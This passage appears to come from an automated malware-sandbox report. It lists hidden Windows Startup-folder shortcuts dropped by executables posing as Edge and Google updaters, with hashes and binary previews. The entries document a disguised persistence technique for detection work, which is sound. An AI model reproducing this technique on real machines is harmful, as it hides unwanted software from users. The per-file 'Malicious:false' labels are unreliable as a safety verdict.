                                                                                                                                                                                                                                          SHA-256:81620D5889FD47D1F1C1E516EF3C1A44C39278B7C617EA3A837575843E7E6662
                                                                                                                                                                                                                                          SHA-512:979B14E00775D8922ABBADBF13C7BBD3CD9E7FC7E89444A897B55A032B2278A13FD2740269996810C6700D4A420767A68932CC6E27681C1830B978258EF85776
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${......2................V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M......"#r.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYde..Temp..:......EW<2BYde....^........................T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_35ee50e71e6c4619b71b70b242ae8ac6.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:42:54 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.942554079115007
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8d7cDYlXPXv+RIgKef2jiSAzav/42eEFsuqygm:8doDYlf2Rb2sevgosryg
                                                                                                                                                                                                                                          MD5:150DA67D00B6F504E7F0230E2B1B110B
                                                                                                                                                                                                                                          SHA1:1BED125BB26E044D165E2F73FEF6BC9873127A0C
                                                                                                                                                                                                                                          SHA-256:59070C9F01C1AA0178A083877A128812B78FF55284BF3377551A756CFD783B58
                                                                                                                                                                                                                                          SHA-512:7769EEB3C775BDB217C9A471404A5ED0F6E1E2F4DD21642CD06D24B6F1FF07205547514E64CEBE7E2CA4FC8DD751516D76BA652868B992B80C8610CA30CA96CF
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${......P................V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M......"#r.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYVe..Temp..:......EW<2BYVe....^........................T.e.m.p.....`.1.....BYXe..EDGEUP~1..H......BYVeBYXe..........................w([.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_36951cf5aef1466cb61eacc27e3b5823.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:44:10 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.956636009312106
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8qjsDYlXPXv+RYgKyxj/jiSAzav/42eEFsuqygm:86sDYlf2R37sevgosryg
                                                                                                                                                                                                                                          MD5:558CD946091CBF75AB9601CB27B60143
                                                                                                                                                                                                                                          SHA1:EAF8EE2439B772A7CF100DF38253A262D5A1942E
                                                                                                                                                                                                                                          SHA-256:BB628E1E2393773F24D20816DB472E299D10FE93B648041BA14031761893F2C7
                                                                                                                                                                                                                                          SHA-512:563A5B4C1AC557C3EC71FDA9638938C2AFA79E598EC9E384F68D91DF6C07BA67B873A0873485573BEC7D6F91DFA3F6A06C6C2E1A5783CE5199E17E88B5954F22
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${.......................V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M.......!.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BY.e..Temp..:......EW<2BY.e....^.....................v[..T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_3b56e29be77143af8bde562f2760f188.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:43:57 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.957125631500882
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8OsDYlXPXv+RPgKU8j/jiSAzav/42eEFsuqygm:8OsDYlf2Rf7sevgosryg
                                                                                                                                                                                                                                          MD5:A1D1FA58B04C5B86CC1420B2B6D1B8C9
                                                                                                                                                                                                                                          SHA1:52B668775D204DE99F1A27D48B2547AD16A7A14A
                                                                                                                                                                                                                                          SHA-256:1E9BA20792B8B31F3AB6620BA8D84A308CF1D7ABF88E2AC99336BBB8C67371CA
                                                                                                                                                                                                                                          SHA-512:F9A763540E4AFEFEAC46550471F8B3F66E89B498F3A62C987B50F1591474760DBBB7381A34EF9E8B7071D96B72CBA6C437B64A898CD779F1B0675ACFE3D0E8D2
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${.......Bl..............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M.......!.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYqe..Temp..:......EW<2BYre....^.....................n...T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_3d2f22f76a3944d4b3a3725942944392.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:44:35 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.958598365225418
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8gjSDYlXPXv+RvgKWnj/jiSAzav/42eEFsuqygm:8gjSDYlf2R2n7sevgosryg
                                                                                                                                                                                                                                          MD5:95CAFAB74AD769E4FC56BF97B2997ECD
                                                                                                                                                                                                                                          SHA1:A8C73A5B500B575F94AEE16E2EDDDA1925E0C7EE
                                                                                                                                                                                                                                          SHA-256:7E3C22302B976F01126FB2C2B0FC1E26800ED3BF20381E5496D6095BE66699E5
                                                                                                                                                                                                                                          SHA-512:38CBE2986307FDF112D36F2F03F82D1EBD547D21EC31443ECD4C1D52CD89809E02930971A00A79968786F1D80726A25BC730B004771D4D953ED71FF9E4048488
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${........3..............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M.......,..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BY.e..Temp..:......EW<2BY.e....^......................([.T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_46b371e47ae14db5a06b9dbcd7681d4e.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:44:14 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.9641511674994545
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8JsDYlXPXv+RB4gK+j/jiSAzav/42eEFsuqygm:8JsDYlf2Rf7sevgosryg
                                                                                                                                                                                                                                          MD5:CD7C6971CFAFA6CC5DF5BEB6DB8424F3
                                                                                                                                                                                                                                          SHA1:9D0FDD7BD76097E680F92CD83310E87B5A09526A
                                                                                                                                                                                                                                          SHA-256:34E716F9509B1DDE0D2579E149A7786C438F9EE78C789277F91F17681E59D3E8
                                                                                                                                                                                                                                          SHA-512:E36B3F545C42DFEBF164637087922427104F94DC1925C825CD5C467F6CA82747FAA8C5B549A257A2678EA90CC74867B2E2526BC7D596C204D37BB97056FFF92F
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${.......e...............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M.......!.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BY.e..Temp..:......EW<2BY.e....^.....................g..T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_48ccaff91cd041ae80361f511486590f.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:42:48 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.935398011137789
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:86V07cDYlXPXv+RIgKef2jiSAzav/42eEFsuqygm:8Y0oDYlf2Rb2sevgosryg
                                                                                                                                                                                                                                          MD5:7538B7E402BA198DF3B4F73CF7C0FE0D
                                                                                                                                                                                                                                          SHA1:0CAADAC4196241652474CF312B0F3F8BC51F2B60
                                                                                                                                                                                                                                          SHA-256:3221F6D8EE0A3628732F8A5C35DE929960057023C16B10AF750617A43C964C3F
                                                                                                                                                                                                                                          SHA-512:B55AF8563A49A889C471665E19577C5C49CE2BC056FD4F24FC463615BCB9CE499A868FC6000A0311374AA90A06241F361E6D6E1015C7E3E929C3DD29001E1FEE
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${........N..............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M......"#r.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYVe..Temp..:......EW<2BYVe....^........................T.e.m.p.....`.1.....BYXe..EDGEUP~1..H......BYVeBYXe..........................w([.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_4a175a2de0d44214a41f9a6bbda7f9cc.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:44:16 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.9726815124264165
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8Lp0sDYlXPXv+R3gKE8bj/jiSAzav/42eEFsuqygm:8Lp0sDYlf2RF7sevgosryg
                                                                                                                                                                                                                                          MD5:105E63DE81B1E05FA997B85D399C55A9
                                                                                                                                                                                                                                          SHA1:BBC7D3B09E78D20B470FD51F28BEF54EB0F034E4
                                                                                                                                                                                                                                          SHA-256:32F631A1DD77C92DD172F3830A14FD42AE31474C64DEB59C246B8DA631C8C007
                                                                                                                                                                                                                                          SHA-512:E64F1AD3022973CF987CF50CFC870AA87D21293F69D87FE41A49DC7039AE97D6267741B57B30FFBCECFD87FA4BB23690665F00A647F513287E42DD891A18B48D
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${......+................V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M.......!.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BY.e..Temp..:......EW<2BY.e....^.........................T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_4fdf717f7b074146a6c5e1dc515a8133.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:43:32 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.96028186690892
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8XjsDYlXPXv+RPgKcmoj/jiSAzav/42eEFsuqygm:8zsDYlf2RS7sevgosryg
                                                                                                                                                                                                                                          MD5:C9081A74789512F9C3BBDAE99562C7AC
                                                                                                                                                                                                                                          SHA1:136EBD94C5D863B91D498FEE1B85A594F308811F
                                                                                                                                                                                                                                          SHA-256:B79E8CBF1B21BC55D860BF755CEA292A6149E201C37C77F3CA3A0982C7A3F725
                                                                                                                                                                                                                                          SHA-512:79FFB87B6AF96BAA49BC60F287C39E1C8021AC4BC29DDBF74031A43C034651DEC1B70B4810858804E205F66028BE84F4626101B4F8D6F1093C5C471C3E7CABD4
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${......................V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M.......!.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYqe..Temp..:......EW<2BYqe....^........................T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_50f2993888c342ef9871af89b3867487.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:43:33 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.9588646325692025
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8ssDYlXPXv+RPgKcwxj/jiSAzav/42eEFsuqygm:8ssDYlf2Rbx7sevgosryg
                                                                                                                                                                                                                                          MD5:B0399DC55987E166C3CB4CCCA1932B58
                                                                                                                                                                                                                                          SHA1:EF62DACE17D29E2263FED90CA7AB791FCA32F43E
                                                                                                                                                                                                                                          SHA-256:0061FA4E9B6F3AE403F1E3A2FF80FB3223EE04D38EBE32C560549A4B30EE65F6
                                                                                                                                                                                                                                          SHA-512:D0B553F35F25CD1386D141BBB3AD4F7667BA5E386C9EACE8376DF4DF22330DEF7B3384A7A07C7412FC0A217CA327D7892FB4176D7C70EC116470E13B2EEF7C20
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${......l8P..............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M.......!.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYqe..Temp..:......EW<2BYqe....^......................f..T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_523c6ede001f4d268d715ccc1fa5fb3a.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:43:02 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.9447056925259965
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8Q7cDYlXPXv+RIgKeuj/jiSAzav/42eEFsuqygm:8QoDYlf2RC7sevgosryg
                                                                                                                                                                                                                                          MD5:52AFBE24F0FC0A70FF17A6F846F2CF72
                                                                                                                                                                                                                                          SHA1:D6810D5AB2845ABCCB0F37BC07F55B9B749DEBAE
                                                                                                                                                                                                                                          SHA-256:DAB1398C1A57062331427A622418842C0446C6152A38E399F160E14E4BCE7E64
                                                                                                                                                                                                                                          SHA-512:EAE7F4AF4539FE92B508F23EDD1E29C3B47F3E1F18FD47C0B9EDC7EB04D5E5577B83D287A3BD8236951B93ABA0386EF271BADCD6491101EC4F0715F6EF423995
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${.......+a..............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M......"#r.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYVe..Temp..:......EW<2BYVe....^........................T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_56ef7a19bbfc4202b97b115ecc0b343c.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:44:30 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.959149730572265
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8uSDYlXPXv+R2PgKoj/jiSAzav/42eEFsuqygm:8uSDYlf2R2o7sevgosryg
                                                                                                                                                                                                                                          MD5:D40501B3EADCDBF021D8A1C2D3E5F452
                                                                                                                                                                                                                                          SHA1:2D353CD8C9DA799618F98F45968F175D96D2CEEA
                                                                                                                                                                                                                                          SHA-256:7F2A7AB7676498528EBE70EE4107CA1520FDD70A8455975216044220D8798356
